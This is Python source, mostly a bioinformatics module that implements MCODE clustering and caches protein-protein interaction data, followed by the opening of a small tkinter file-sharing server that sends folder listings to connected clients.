# gpInputGraph = gpCurCore
# i+=1
# print("try ",i)
#k = i-1
#print("Answer ", lb)
if self.l_cache:
self.cache_kcore.update({x:lb for x in S_md5})
return {'k':lb, 'network':gpPrevCore}
#in the last iteration, gpCurCore is null (loop termination condition)
#@staticmethod
def calc_node_info(self, node, degreeCutoff=None):
k = self.degree(node)
neighbors = self.neighbors(node)
s_md5=""
#print("::::",node, ":::", k, "::::")
#sw=util.StopWatch()
if (k < 2):
nodeInfo = NodeInfo()
if (k == 1):
nodeInfo.coreLevel = 1
nodeInfo.coreDensity = 1.0
nodeInfo.density = 1.0
nodeInfo.numNodeNeighbors = len(neighbors); #########
nodeInfo.nodeNeighbors = neighbors; ####
# why ignore neighbor when k==1 in the original code???
else:
gpNodeNeighborhood = self.subnetwork(neighbors+[node])
#sw.check('subnetwork')
if (gpNodeNeighborhood.is_empty()):
util.error_msg("In calc_node_info(): gpNodeNeighborhood was None.")
#calculate the node information for each node
if self.l_cache:
s_md5=gpNodeNeighborhood.node_MD5()
if s_md5 in self.cache_info:
#self.hit+=1
nodeInfo=self.cache_info[s_md5].clone()
nodeInfo.nodeNeighbors=neighbors
return nodeInfo
nodeInfo = NodeInfo()
#density
nodeInfo.density = MCODE.calc_density(gpNodeNeighborhood, self.params['includeLoops'])
#w.check('density')
nodeInfo.numNodeNeighbors = len(neighbors)
#calculate the highest k-core
c = self.get_highest_KCore(gpNodeNeighborhood)
#w.check('kcore')
k = c['k']
gpCore = c['network']
nodeInfo.coreLevel = k
if (gpCore is not None and not gpCore.is_empty()):
nodeInfo.coreDensity = MCODE.calc_density(gpCore, self.params['includeLoops'])
#w.check('cacl_density')
#record neighbor array for later use in cluster detection step
nodeInfo.nodeNeighbors = neighbors
if degreeCutoff: nodeInfo.score_node(degreeCutoff)
if self.l_cache:
self.cache_info[s_md5]=nodeInfo
return nodeInfo
def score_graph(self):
self.C_nodeInfo = {}
self.C_nodeByScore = []
S_node = self.nodes()
rows=[]
#sw=util.StopWatch()
if self.CPU<=1:
for node in S_node:
nodeInfo = self.calc_node_info(node, self.params['degreeCutoff'])
self.C_nodeInfo[node]=nodeInfo
rows.append({'Node':node, 'Score':nodeInfo.score, 'Density':nodeInfo.density, 'numNodeNeighbors':nodeInfo.numNodeNeighbors})
else:
def f(X):
return self.calc_node_info(X[0], X[1])
#mp=parallel.MP()
#mp.start(f, n_CPU=self.CPU)
L=[ (x, self.params['degreeCutoff']) for x in S_node]
out=parallel.parmap(f, L, n_CPU=self.CPU)
#out=mp.map(L)
for i,node in enumerate(S_node):
self.C_nodeInfo[node]=out[i]
rows.append({'Node':node, 'Score':out[i].score, 'Density':out[i].density, 'numNodeNeighbors':out[i].numNodeNeighbors})
#sw.check('Done scoring')
t=pd.DataFrame(rows)
t=t.sort_values(['Score', 'Density', 'numNodeNeighbors', 'Node'], ascending=[False, False, False, True])
grps=t.groupby(by='Score')
self.C_nodeByScore=[ (score,list(grp['Node'])) for score,grp in grps]
self.C_nodeByScore.sort(key=lambda x: x[0])
self.C_nodeByScore.reverse()
def get_cluster_core_internal(self, startNode, c_nodeSeen, startNodeScore, currentDepth, myCluster, nodeScoreCutoff, maxDepthFromStart):
#base cases for recursion
if (startNode in c_nodeSeen): return
c_nodeSeen[startNode]=True
if (currentDepth > maxDepthFromStart): return
#don't exceed given depth from start node
#Initialization
neighbors = self.C_nodeInfo[startNode].nodeNeighbors
#neighbors.sort()
#print "A:"+startNode
#print c_nodeSeen
for node in neighbors:
#go through all currentNode neighbors to check their core density for cluster inclusion
#print "Neigh:"+node
if (node in c_nodeSeen): continue
if (self.C_nodeInfo[node].score >= (startNodeScore - startNodeScore * nodeScoreCutoff)):
myCluster.append(node)
#try to extend cluster at this node
self.get_cluster_core_internal(node, c_nodeSeen, startNodeScore, currentDepth + 1, myCluster, nodeScoreCutoff, maxDepthFromStart)
def get_cluster_core(self, startNode, c_nodeSeen, nodeScoreCutoff, maxDepthFromStart):
myCluster = []
self.get_cluster_core_internal(startNode, c_nodeSeen, self.C_nodeInfo[startNode].score, 1, myCluster, nodeScoreCutoff, maxDepthFromStart)
return self.subnetwork(myCluster+[startNode])
def fluff_cluster_boundary(self, myCluster, c_nodeSeen):
#create a temp list of nodes to add to avoid concurrently modifying 'cluster'
nodesToAdd = []
#Keep a separate internal nodeSeenHashMap because nodes seen during a fluffing should not be marked as permanently seen,
#they can be included in another cluster's fluffing step.
c_nodeSeenInternal = {}
#add all current neighbour's neighbours into cluster (if they have high enough clustering coefficients) and mark them all as seen
S_node=myCluster.nodes()
for node in S_node:
neighbors = self.C_nodeInfo[node].nodeNeighbors
for nb in neighbors:
if (nb in c_nodeSeen): continue
if (nb in c_nodeSeenInternal): continue
if (self.C_nodeInfo[nb].density > self.params['fluffNodeDensityCutoff']):
nodesToAdd.append(nb)
c_nodeSeenInternal[nb]=True
#Add fluffed nodes to cluster
if (len(nodesToAdd)>0):
return self.subnetwork(S_node+nodesToAdd)
return myCluster
def filter_cluster(self, gpClusterGraph):
if (gpClusterGraph.is_empty()): return True
#filter if the cluster does not satisfy the user specified k-core
gpCore = MCODE.get_KCore(gpClusterGraph, self.params['kCore'])
if (gpCore is None or gpCore.is_empty()): return True
return False
@staticmethod
def haircut_cluster(myCluster):
#get 2-core
gpCore = MCODE.get_KCore(myCluster, 2)
if (gpCore is not None or not gpCore.is_empty()):
#clear the cluster and add all 2-core nodes back into it
#must add back the nodes in a way that preserves gpInputGraph node indices
# we cannot do myCluster=gpCore, which will not change myCluster outside
return gpCore
return myCluster
def find_clusters(self, l_decompose=True, l_optimized=True):
if (self.is_empty()):
util.error_msg("In find_Clusters(): input network is empty!")
if (not len(self.C_nodeInfo.keys()) or not len(self.C_nodeByScore)):
util.error_msg("In find_Clusters(): C_nodeInfo or C_nodeByScore is None.")
C_results=[]
cnt=0
#initialization
c_nodeSeen= {} #key is nodeIndex, value is true/false
c_nodeSeenSnapshot={}
findingTotal = len(self.C_nodeInfo.keys())
rows=[]
for score,alNodesWithSameScore in self.C_nodeByScore:
if not l_optimized or len(alNodesWithSameScore)<=1:
for currentNode in alNodesWithSameScore:
if currentNode in c_nodeSeen: continue
alCluster = self.get_cluster_core(currentNode, c_nodeSeen, self.params['nodeScoreCutoff'], self.params['maxDepthFromStart'])
if (alCluster is not None and not alCluster.is_empty()):
#make sure seed node is part of cluster, if not already in there
if (not self.filter_cluster(alCluster)):
if (self.params['haircut']): alCluster=MCODE.haircut_cluster(alCluster)
if (self.params['fluff']): alCluster=self.fluff_Cluster_boundary(alCluster, c_nodeSeen)
if l_decompose:
c_components=alCluster.decompose()
else:
c_components=[alCluster]
for comp in c_components:
cnt+=1
score=self.score_network(comp)
C_results.append(MCODECluster(comp, currentNode, score))
rows.append({'ID':cnt, 'Score':score, 'NofNode':comp.nof_nodes(), 'SeedScore':self.C_nodeInfo[currentNode].score})
else:
def f(X):
tmp_rows=[]
c_stack={}
currentNode=X[0]
c_nodeSeenCopy=X[1].copy()
#if currentNode in c_nodeSeen: continue
alCluster = self.get_cluster_core(currentNode, c_nodeSeenCopy, self.params['nodeScoreCutoff'], self.params['maxDepthFromStart'])
if (alCluster is not None and not alCluster.is_empty()):
#make sure seed node is part of cluster, if not already in there
if (not self.filter_cluster(alCluster)):
if (self.params['haircut']): alCluster=MCODE.haircut_cluster(alCluster)
if (self.params['fluff']): alCluster=self.fluff_Cluster_boundary(alCluster, c_nodeSeenCopy)
if l_decompose:
c_components=alCluster.decompose()
else:
c_components=[alCluster]
for k,comp in enumerate(c_components):
score=self.score_network(comp)
tmp_rows.append({'ID':currentNode, 'Score':score, 'NofNode':comp.nof_nodes(), 'SeedScore':self.C_nodeInfo[currentNode].score, 'ComponentIndex':k})
c_stack[currentNode]={'nodeSeen':c_nodeSeenCopy, 'components':c_components}
return (tmp_rows, c_stack)
while (len(alNodesWithSameScore)):
tmp_rows=[]
c_stack={}
L=[ (x, c_nodeSeen) for x in alNodesWithSameScore if x not in c_nodeSeen ]
#if self.CPU<=1:
# out=[f(x) for x in L]
#else:
# mp=parallel.MP()
# mp.start(f, n_CPU=self.CPU)
# out=mp.map(L)
out=parallel.parmap(f, L, n_CPU=self.CPU)
for X in out:
tmp_rows.extend(X[0])
c_stack.update(X[1])
tmp=pd.DataFrame(tmp_rows)
if len(tmp):
tmp=tmp.sort_values(['Score','NofNode','SeedScore', 'ID'], ascending=[False, False, False, True])
bestNode=tmp['ID'].iloc[0]
c_nodeSeen=c_stack[bestNode]['nodeSeen']
for comp in tmp_rows:
if comp['ID']!=bestNode: continue
compIdx=comp['ComponentIndex']
cnt+=1
C_results.append(MCODECluster(c_stack[bestNode]['components'][compIdx], bestNode, comp['Score']))
rows.append({'ID':cnt, 'Score':comp['Score'], 'NofNode':comp['NofNode'], 'SeedScore':self.C_nodeInfo[bestNode].score})
alNodesWithSameScore=[ x for x in alNodesWithSameScore if x !=bestNode]
else:
for x in c_stack:
for s in x.nodeSeen.keys():
c_nodeSeen[s]=True
alNodesWithSameScore=[]
C_sorted=[]
t=pd.DataFrame(rows)
if len(t):
t=t.sort_values(['Score','NofNode','SeedScore'], ascending=[False, False, False])
for i in range(len(t)):
C_sorted.append(C_results[t['ID'].iloc[i]-1])
return C_sorted
def to_MCODE_table(self, S_mcode_clusters):
rows=[]
for i,c in enumerate(S_mcode_clusters):
S_nodes=c.nodes()
for node in S_nodes:
ty='Seed' if node==c.seedNode else 'Clustered'
rows.append({'Cluster':i+1, 'Score':c.score, 'Type':ty, 'Gene':node})
if len(rows)==0:
return None
t=pd.DataFrame(rows)
if 'Symbol' in self.T_node.header():
c_name={self.T_node['Gene'].iloc[i] : self.T_node['Symbol'].iloc[i] for i in range(len(self.T_node))}
t['Symbol']=t['Gene'].map(c_name)
return t
@staticmethod
def MCODE_label(network, s_col_name='MCODE_LABEL'):
"""Label nodes in the network by their MCODE cluster IDs, great for coloring nodes"""
network=Network(network) # makes a copy
L=network.decompose()
c_attr={}
for j,net in enumerate(L):
mc=MCODE(net)
mc.params['hariCut']=True
components=mc.find_clusters(True, True)
for i,c in enumerate(components):
S_nodes=c.nodes()
for x in S_nodes:
if x not in c_attr:
c_attr[x]="N%dC%d" % (j+1, i+1)
else:
c_attr[x]+=" N%dC%d" % (j+1, i+1)
network.add_a_node_attr(s_col_name, c_attr)
return network
def __init__(self, network, n_CPU=0, l_cache=True):
self.C_nodeInfo = None
#key is the node name, value is a NodeInfo instance
C_nodeByScore = None
#a collection of array, {{Na, Nb}, {Nc}, {Nd,Ne} ...}, where nodes are sorted by descending score
# nodes with the same NodeInfo.score are group in one array
super(MCODE, self).__init__(network)
#"Scoring all nodes in the network ..."
self.CPU=n_CPU
self.l_cache=l_cache
#self.hit=0
self.cache_info={}
self.cache_kcore={}
self.score_graph()
#for c,v in self.C_nodeInfo.items():
# print c, v
class Cache(object):
DATA_DIR=setting.ppi['DATA_DIR']
ppi_data={'LOCAL':{}, 'GPDB':{}, 'HISTORY':{}}
ppi_node={'LOCAL':{}, 'GPDB':{}, 'HISTORY':{}}
ppi_edge={'LOCAL':{}, 'GPDB':{}, 'HISTORY':{}}
CUTOFF_PHYS=132
CUTOFF_COMB=187
VERSION=setting.ppi.get('VERSION',2) # 1: without STRING DB, 2: with STRING DB, database scheme changed
@staticmethod
def gene2node(S_gene, con=None):
if con is None: con=db.DB('METASCAPE')
t_node=con.sql_in("SELECT gid Gene,source_id Symbol from gid2source_id t where gid in (", ") and t.id_type_id=1", util.rarray2iarray(S_gene))
t_node['Gene']=t_node.Gene.astype(str)
if len(S_gene)!=len(t_node):
util.warn_msg("Strange, gene ID has no symbol?")
t=pd.DataFrame({'Gene':list(S_gene)})
t_node=t.merge(t_node, left_on='Gene', right_on='Gene', how='left')
X=t_node.Symbol.isnull()
#print(t_node.loc[X][:10])
if X.any():
t_node.loc[X,'Symbol']=t_node.loc[X,'Gene']
return t_node
@staticmethod
def df2data(t, con=None):
nodes=set(t.Gene_A)|set(t.Gene_B)
data={ k:{} for k in nodes }
[ (data[k].__setitem__(v,c) or data[v].__setitem__(k,c)) for k,v,c in zip(t.Gene_A, t.Gene_B, t.SCORE) ]
return (data, Cache.gene2node(nodes, con=con))
@staticmethod
def get(l_use_GPDB=True, S_DB=None, tax_id=9606):
"""In VERSION=2, S_DB is a string, one of "PHYSICAL_CORE","PHYSICAL_ALL","COMBINED_CORE","COMBINED_ALL"
getting a phyiscal db will populate both PHYSICAL_CORE and PHYSICAL_ALL
getting a combined db will populate all four databases
"""
S_DB=S_DB or Cache.get_DB(l_use_GPDB)
if Cache.VERSION==1: # in version one we merge all db data in S_DB
S_DB.sort()
s_db=":".join(S_DB)
if not (tax_id in Cache.ppi_data['HISTORY'] and s_db in Cache.ppi_data['HISTORY'][tax_id]):
s_key=Cache.key(l_use_GPDB)
Cache.load(tax_id=tax_id, l_use_GPDB=l_use_GPDB, S_DB=S_DB)
data=None
out_node=[]
for x in S_DB:
#print ">>>>>>>>>", S_DB, x, Cache.ppi_data[s_key][tax_id].keys()
c=Cache.ppi_data[s_key][tax_id].get(x, {})
if data is None:
data=c
else:
for k in c.keys():
for v,score in c[k].items():
if k not in data:
data[k]=c[k].copy()
else:
data[k][v]=max(score, data[k].get(v,0))
out_node.append(Cache.ppi_node[s_key][tax_id].get(x, pd.DataFrame()))
t_node=pd.concat(out_node, ignore_index=True)
t_node.drop_duplicates('Gene', inplace=True)
if tax_id not in Cache.ppi_data['HISTORY']:
Cache.ppi_data['HISTORY'][tax_id]={}
Cache.ppi_node['HISTORY'][tax_id]={}
Cache.ppi_edge['HISTORY'][tax_id]={}
Cache.ppi_data['HISTORY'][tax_id][s_db]=data
Cache.ppi_node['HISTORY'][tax_id][s_db]=t_node
else: # In VERSION 2, each entry in S_DB is its own collection
s_db=S_DB
#print(tax_id, list(Cache.ppi_data['HISTORY'].keys()), list(Cache.ppi_data['HISTORY'][tax_id].keys()))
if not (tax_id in Cache.ppi_data['HISTORY'] and s_db in Cache.ppi_data['HISTORY'][tax_id]):
Cache.load(tax_id=tax_id, l_use_GPDB=True, S_DB=s_db)
return (Cache.ppi_data['HISTORY'][tax_id][s_db], Cache.ppi_node['HISTORY'][tax_id][s_db], \
Cache.ppi_edge['HISTORY'][tax_id].get(s_db, None))
@staticmethod
def info():
for s_key in ('LOCAL','GPDB','HISTORY'):
print(">Databases: %s" % s_key)
for tax_id in Cache.ppi_data[s_key].keys():
print("TAX_ID=%d (%s)" % (tax_id, ez.Cache.C_TAX_NAME.get(tax_id, "UNKNOWN")))
for s_db in Cache.ppi_data[s_key][tax_id].keys():
print("Source: %s" % s_db)
print("PPI_DATA=%d" % len(Cache.ppi_data[s_key][tax_id][s_db]))
print("PPI_NODE=%d" % len(Cache.ppi_node[s_key][tax_id][s_db]))
print("PPI_EDGE=%d" % len(Cache.ppi_edge[s_key][tax_id][s_db]))
print("")
@staticmethod
def unload(tax_id, l_use_GPDB):
s_key=Cache.key(l_use_GPDB)
if tax_id in Cache.ppi_data[s_key]:
del Cache.ppi_data[s_key][tax_id]
del Cache.ppi_node[s_key][tax_id]
@staticmethod
def key(l_use_GPDB):
return 'GPDB' if l_use_GPDB else 'LOCAL'
@staticmethod
def get_DB(l_use_GPDB=True):
if Cache.VERSION==1:
DEFAULT_DB=["BioGrid","InWeb_IM","OmniPath"] if l_use_GPDB else ["BHMRRS","CORUM","Prolexys","Chanda"] # String
else:
DEFAULT_DB=setting.ppi.get('DEFAULT_DB', ["PHYSICAL_CORE","PHYSICAL_ALL","COMBINED_CORE","COMBINED_ALL"][2])
return DEFAULT_DB
@staticmethod
def load(tax_id=9606, l_use_GPDB=True, S_DB=None, entrez=None):
"""tax_id is None, defaults to 9606, if 0, means load all supported species,
entrez is only used in local mode to accelerate Symbol retrieval"""
sw=util.StopWatch()
if Cache.VERSION==2:
if S_DB is None: S_DB="PHYSICAL_CORE"
if type(S_DB)!=str: util.error_msg("S_DB must be a string in VERSION 2")
s_db=S_DB
fn=setting.ppi.get('STRING_PATH', os.path.join(os.path.dirname(__file__),"STRING/Interaction.csv.gz"))
mydb=db.DB('METASCAPE')
if tax_id==0:
S_tax_id=ez.Cache.C_TAX_ID.values()
else:
S_tax_id=[tax_id]
data=[]
for i_tax_id in S_tax_id:
fn=setting.ppi.get('STRING_PATH', os.path.join(os.path.dirname(__file__), f"STRING/Interaction.{i_tax_id}.csv.gz"))
if os.path.exists(fn):
t=util.read_csv(fn, dtype={'gid_A':str, 'gid_B':str})
if "PHYSICAL" in s_db:
t=t[t.interaction_type_id==11].copy()
t.rename2({'gid_A':'Gene_A', 'gid_B':'Gene_B', 'tax_id_A':'tax_id'})
sw.check(f"data loaded from {fn}")
else:
if i_tax_id>0:
if "PHYSICAL" in s_db:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction where tax_id_A=? and interaction_type_id=11", params=[i_tax_id])
else:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction where tax_id_A=?", params=[i_tax_id])
else:
if "PHYSICAL" in s_db:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction where interaction_type_id=11")
else:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction")
t['Gene_A']=t.Gene_A.astype(str)
t['Gene_B']=t.Gene_B.astype(str)
if sum(t.Gene_A>t.Gene_B):
util.info_msg("Genes not order by str, canonicalize required!")
t=Network.canonicalize_table(t) # since we change type to str, we need to reorder it
data.append(t)
if len(data)==1:
t=data[0]
else:
t=pd.concat(data, ignore_index=True)
#sw.check("Canonicalized")
t['TYPE']='Direct'
sw.check("Start processing each tax_id")
S_tax_id=t.tax_id.unique()
for tax_id in S_tax_id:
#for tax_id,t_v in t.groupby('tax_id'):
#sw.check("ENTER GROUPBY")
if tax_id not in Cache.ppi_data['HISTORY']:
Cache.ppi_data['HISTORY'][tax_id]={}
Cache.ppi_node['HISTORY'][tax_id]={}
Cache.ppi_edge['HISTORY'][tax_id]={}
if "COMBINED" in s_db:
tmp=t.loc[t.tax_id==tax_id, ['Gene_A','Gene_B','TYPE','score_combined','support']].copy()
#sw.check("COPY")
tmp.rename2({'score_combined':'SCORE'})
data,t_node=Cache.df2data(tmp, con=mydb)
#sw.check("DICT")
Cache.ppi_data['HISTORY'][tax_id]["COMBINED_ALL"]=data
Cache.ppi_node['HISTORY'][tax_id]["COMBINED_ALL"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["COMBINED_ALL"]=tmp
#sw.check("Combined all")
tmp=tmp[tmp.SCORE>=Cache.CUTOFF_COMB].copy()
#sw.check("FILTER")
data,t_node=Cache.df2data(tmp, con=mydb)
#sw.check("DICT2")
Cache.ppi_data['HISTORY'][tax_id]["COMBINED_CORE"]=data
Cache.ppi_node['HISTORY'][tax_id]["COMBINED_CORE"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["COMBINED_CORE"]=tmp
#tmp=t_v[t_v.interaction_type_id==11]
tmp=t.loc[(t.tax_id==tax_id) & (t.interaction_type_id==11)]
tmp=tmp[['Gene_A','Gene_B','TYPE','score_physical','support']].copy()
tmp.rename2({'score_physical':'SCORE'})
#sw.check("Combined core")
data,t_node=Cache.df2data(tmp, con=mydb)
Cache.ppi_data['HISTORY'][tax_id]["PHYSICAL_ALL"]=data
Cache.ppi_node['HISTORY'][tax_id]["PHYSICAL_ALL"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["PHYSICAL_ALL"]=tmp
#sw.check("Physical all")
tmp=tmp[tmp.SCORE>=Cache.CUTOFF_COMB].copy()
data,t_node=Cache.df2data(tmp, con=mydb)
Cache.ppi_data['HISTORY'][tax_id]["PHYSICAL_CORE"]=data
Cache.ppi_node['HISTORY'][tax_id]["PHYSICAL_CORE"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["PHYSICAL_CORE"]=tmp
#sw.check("Physical core")
sw.check(f"processed :{tax_id}")
t=t.loc[t.tax_id!=tax_id]
return
S_DB=S_DB or Cache.get_DB(l_use_GPDB)
if tax_id is None:
util.error_msg('tax_id must be an int, or 0 means all supported species')
tax_id=abs(tax_id)
s_key=Cache.key(l_use_GPDB)
S_tax_id=[]
if not l_use_GPDB:
if tax_id not in (0,9606):
util.error_msg('Local database only supports human!')
tax_id=9606
if tax_id in Cache.ppi_data[s_key]:
S_DB=[x for x in S_DB if x not in Cache.ppi_data[s_key][tax_id]]
if len(S_DB)==0: return
S_tax_id=[tax_id]
T=[]
for filename in S_DB:
print("loading PPI database: "+filename+" ...")
if os.path.isfile(filename):
t=pd.read_csv(filename)
t['ds']=filename
T.append(t)
elif os.path.isfile(Cache.DATA_DIR+filename+".csv"):
t=pd.read_csv(Cache.DATA_DIR+filename+".csv")
t['ds']=filename
T.append(t)
else:
util.warn_msg('PPI database ' + filename + ' not found.')
if len(T)>1:
t=pd.concat(T, axis=0, ignore_index=True)
else:
t=T[0]
t=t[(t.Gene_A!=t.Gene_B) & (t.Score>=0.5)].copy()
eg=entrez
if eg is None:
eg=ez.EntrezGene(tax_id=tax_id)
else:
eg.load_organism(tax_id=tax_id)
c_seen={}
t.index=list(range(len(t)))
t['Gene_A']=t.Gene_A.astype(str)
t['Gene_B']=t.Gene_B.astype(str)
S_gene_A=t.Gene_A.tolist()
S_gene_B=t.Gene_B.tolist()
for i in range(len(t)):
gene_A=S_gene_A[i]
gene_B=S_gene_B[i]
if gene_A not in c_seen:
c_seen[gene_A]=eg.fix_gene_id(gene_A)
S_gene_A[i]=c_seen[gene_A]
if S_gene_A[i] is None: continue
if gene_B not in c_seen:
c_seen[gene_B]=eg.fix_gene_id(gene_B)
S_gene_B[i]=c_seen[gene_B]
t['Gene_A']=S_gene_A
t['Gene_B']=S_gene_B
t=t[~(t.Gene_A.isnull() | t.Gene_B.isnull())].copy()
t.index=list(range(len(t)))
t['tax_id']=tax_id
else:
mydb=db.DB('METASCAPE')
if tax_id>0 and tax_id in Cache.ppi_data[s_key]:
S_DB=[x for x in S_DB if x not in Cache.ppi_data[s_key][tax_id]]
if len(S_DB)==0: return
if tax_id>0:
print("loading PPI database from database for tax_id: %d ..." % tax_id)
t=mydb.sql_in("SELECT gid_A Gene_A,gid_B Gene_B,0 Score,tax_id_A tax_id,ds from interaction where interaction_category!='genetic' and gid_A!=gid_B and tax_id_A=tax_id_B and tax_id_A=? and ds in (", ")", S_DB, params_before=[tax_id])
S_tax_id=[tax_id]
else:
#ZZZ modify in the future, to obtain the list of all supported tax_id
t=mydb.from_sql('SELECT DISTINCT tax_id FROM gid2source_id')
S_tax_id=[x for x in t.tax_id.astype(int).tolist() if x not in Cache.ppi_data[s_key]]
if len(S_tax_id):
s_tax_id=",".join(util.iarray2sarray(S_tax_id))
print("loading PPI database for tax_id: %s ..." % s_tax_id)
t=mydb.sql_in("SELECT gid_A Gene_A,gid_B Gene_B,0 Score,tax_id_A tax_id,ds from interaction where interaction_category!='genetic' and gid_A!=gid_B and tax_id_A=tax_id_B and ds in (", ")", S_DB)
#t=mydb.sql_in("SELECT gid_A Gene_A,gid_B Gene_B,0 Score,tax_id_A tax_id,ds from interaction where interaction_category!='genetic' and gid_A!=gid_B and tax_id_A=tax_id_B and tax_id_A in ("+s_tax_id+") and ds in (", ")", S_DB)
else:
t=pd.DataFrame()
if len(t):
t['Gene_A']=t.Gene_A.astype(str)
t['Gene_B']=t.Gene_B.astype(str)
if sum(t.Gene_A>t.Gene_B):
t=Network.canonicalize_table(t) # since we change type to str, we need to reorder it
for x in S_tax_id:
#print ">>>>>>>>>>>>>>>>>>>>>>>", x
if x not in Cache.ppi_data[s_key]:
Cache.ppi_data[s_key][x]={}
Cache.ppi_node[s_key][x]={}
for y in S_DB:
Cache.ppi_data[s_key][x][y]={}
Cache.ppi_node[s_key][x][y]=pd.DataFrame()
if len(t)==0: return
for k,t_v in t.groupby(['tax_id','ds']):
#print ">>>", k, len(t_v)
#t_v=t_v.copy()
if k[0] not in S_tax_id: continue
data={}
t_node=None
#t_v=t_v.copy()
#t_v.index=list(range(len(t_v)))
#for i in t_v.index:
#if i%1000==0: print i
for row in t_v.itertuples():
gene_A=row.Gene_A #t_v.ix[i,'Gene_A']
gene_B=row.Gene_B #t_v.ix[i,'Gene_B']
score=row.Score #t_v.ix[i,'Score']
if gene_A not in data:
data[gene_A]={gene_B:score}
else:
data[gene_A][gene_B]=max(score, data[gene_A].get(gene_B,0))
if gene_B not in data:
data[gene_B]={gene_A:score}
else:
data[gene_B][gene_A]=max(score, data[gene_B].get(gene_A,0))
Cache.ppi_data[s_key][k[0]][k[1]]=data
S_gene=list(data.keys())
if l_use_GPDB:
t_node=Cache.gene2node(S_gene, con=mydb)
else:
t_node=eg.gene_sarray_to_table(S_gene, l_description=False)
Cache.ppi_node[s_key][k[0]][k[1]]=t_node
# YZHOU: for InWeb_IM, their web GUI uses a threshold for score
#From: Rasmus Borup Hansen [mailto:rbh@intomics.com]
#Sent: Friday, February 03, 2017 4:22 AM
#Subject: Re: Interaction not shown in InBio Map
#
#To make a long story short: We've tried a number of different strategies for choosing a cutoff, and right now the web interface uses 0.156.
#
#Best,
#
#Rasmus
class PPI(Network):
def __init__(self, tax_id=9606, l_use_GPDB=False, S_DB=None):
"""tax_id is None, defaults to 9606, if 0, means load all species
Warning: S_DB is set in Cache.load(), so preload Cache if you want to use different database"""
self.tax_id=tax_id
data, t_node, t_edge=Cache.get(tax_id=tax_id, l_use_GPDB=l_use_GPDB, S_DB=S_DB)
print("PPI databases loaded")
super(PPI, self).__init__(data, T_node=t_node, name='proteome', premade_T_edge=t_edge, skip_copy=True)
if __name__=="__main__":
#Cache.load(tax_id=9606, S_DB='PHYSICAL_CORE')
#Cache.load(tax_id=9606, S_DB='COMBINED_CORE')
sw=util.StopWatch()
Cache.load(tax_id=9606, S_DB='COMBINED_CORE')
Cache.info()
sw.check('Loaded')
#Cache.load(tax_id=0, l_use_GPDB=True)
#Cache.load(tax_id=0, S_DB=['BioGrid','GeneGO'], l_use_GPDB=True)
#Cache.info()
#exit()
ppi=PPI(l_use_GPDB=True, tax_id=9606)
sw.check('Ready')
exit()
ppi=PPI(l_use_GPDB=True, tax_id=9606)
print(list(Cache.ppi_data['GPDB'].keys()))
#ppi.T_node.to_csv('t1.csv')
#ppi.T_edge.to_csv('t2.csv')
print(ppi.data['132884'])
S_node=['132884','191','537']
test=ppi.subnetwork(S_node)
print(test.nof_nodes())
exit()
## example
S_node=util.read_list('~/RM_Hits.txt')
test=ppi.subnetwork(S_node)
test.to_xgmml('RM_.xgmml')
exit()
S_node=util.read_list('~/CM_Hits.txt')
test=ppi.subnetwork(S_node)
test.to_xgmml('CM_.xgmml')
exit()
#print ppi.T_node[:5]
#print ppi.T_edge[:5]
test=ppi.subnetwork(S_node)
#print test
exit()
mc=MCODE(net)
#print mc.C_nodeByScore
mc.params['hairCut']=True
c=mc.find_clusters(True, True)
print(mc.to_MCODE_table(c))
for i,cp in enumerate(c):
print(">>> Rank "+str(i)+" <<<")
cp.to_xgmml('out/test'+str(i))
S=cp.nodes()
for node in S:
nodeInfo=mc.C_nodeInfo[node]
print("Node=> "+node)
print(nodeInfo)
| data2code/msbio | ppi.py | ppi.py | py | 39,228 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "util.error_msg",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "util.error_msg",
"line_... |
11714358376 | import Server
import os
import socket
import threading
from tkinter import *
from tkinter import filedialog, messagebox
import customtkinter as ctk
from CTkListbox import *
import PIL.Image
import PIL.ImageTk
from Server import *
SIZE = 1024
FORMAT = "utf-8"
PORT = 4000
connFlag = [False, 0]
def serverLogWindow(frame, main_window, folderpath):
# l=[f for f in os.listdir(folderpath) if os.path.isfile(os.path.join(folderpath, f))]
l = []
IP = socket.gethostbyname(socket.gethostname() + ".local")
ADDR = (IP, PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(ADDR)
sock.listen()
devicesConnectedVar = StringVar()
devicesConnectedVar.set(f"Devices connected:{connFlag[1]}")
serverLogs = []
serverLogsVar = Variable(value=str(serverLogs))
serverLogs.append("[STARTING] Server is starting...")
serverLogsVar.set(str(serverLogs))
print("Waiting for connection...")
print(f"Share this code: {IP}")
def checkChanges(server, addr):
l = []
while True:
new_l = [
f
for f in os.listdir(folderpath)
if os.path.isfile(os.path.join(folderpath, f))
]
if connFlag[0] == True or l != new_l:
l = new_l
msg = f"UPDATE%{str(new_l)}"
# print(msg)
server.send(convertToSIZE(msg))
connFlag[0] = False
def serverHandler():
while True:
conn, addr = sock.accept()
if conn:
serverConnected(conn, addr)
def serverConnected(conn, addr):
global server
server = conn
msg = "[NEW CLIENT] : HOST"
# server.send(convertToSIZE(msg.encode(FORMAT)))
server.send(msg.encode(FORMAT))
serverLogs.append(f"[NEW CONNECTION]: {addr} Connected")
serverLogsVar.set(str(serverLogs))
clientThread = threading.Thread(target=clientHandlerHost, args=(server, addr))
clientThread.start()
connFlag[1] += 1
devicesConnectedVar.set(f"Devices connected:{connFlag[1]}")
# if connFlag[1] == 1:
checkChangeThread = threading.Thread(target=checkChanges, args=(server, addr))
checkChangeThread.start()
def clientHandlerHost(server, addr):
new_l = [
f
for f in os.listdir(folderpath)
if os.path.isfile(os.path.join(folderpath, f))
]
msg = f"UPDATE%{str(new_l)}"
